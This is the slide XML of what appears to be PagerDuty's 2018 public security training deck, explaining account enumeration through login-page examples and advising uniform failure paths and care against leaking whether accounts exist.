                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>rich@pagerduty.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1984" name="mrburns@pagerduty.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741216" y="7940476"/>
            <a:ext cx="8422904"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sz="5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>mrburns@pagerduty.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1987" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14652671" y="4246683"/>
            <a:ext cx="2025806" cy="2025806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2025805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1985" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1986" name="✔"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="448583" y="363615"/>
              <a:ext cx="1230239" cy="1400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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr sz="10000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>✔</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1990" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14652671" y="7387194"/>
            <a:ext cx="2025806" cy="2346403"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2346402"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1988" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C62818"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1989" name="!"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="699657" y="107640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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr b="1" sz="13000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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4" name="login_screen.png" descr="login_screen.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="8542" t="0" r="11787" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347199" y="1092680"/>
            <a:ext cx="23689602" cy="12801601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1995"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1996"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997" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1998" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1999" name="https://pagerduty.pagerduty.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://pagerduty.pagerduty.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2000" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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4" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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005"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006" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2007" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2008" name="https://hooli.pagerduty.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://hooli.pagerduty.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2009" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2010" name="account_no_exist.png" descr="account_no_exist.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511519" y="5174225"/>
            <a:ext cx="15498214" cy="4647176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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4"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015"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016" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2017" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2018" name="PagerDuty"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9449117" y="4743648"/>
            <a:ext cx="3840375"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sz="5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PagerDuty </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2019" name="Hooli"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11329973" y="7940476"/>
            <a:ext cx="1834146"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sz="5800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hooli</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2022" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14652671" y="4246683"/>
            <a:ext cx="2025806" cy="2025806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2025805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2020" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="2021" name="✔"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="448583" y="363615"/>
              <a:ext cx="1230239" cy="1400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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr sz="10000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>✔</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2025" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14652671" y="7387194"/>
            <a:ext cx="2025806" cy="2346403"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2346402"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2023" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C62818"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="2024" name="!"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="699657" y="107640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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr b="1" sz="13000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </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9" name="old-computer.jpg" descr="old-computer.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1537451" y="-3375"/>
            <a:ext cx="27458902" cy="13722751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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34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342" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Every system has security issues."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840307" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="821531"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Every system has security issues.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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9" name="Preventing Enumeration"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Preventing Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2030" name="Failure paths should have roughly the same flow.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Failure paths should have roughly the same flow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Avoid true/false requests to test account existence.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2031"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032"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033" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2034"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8"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03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040" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2042" name="Be mindful of leaking sensitive data."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Be mindful of leaking sensitive data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2043" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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7" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048" name="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://blog.rapid7.com/2017/06/15/about-user-enumeration/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2050"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051" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2053" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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57" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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058"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059" name="public"/>
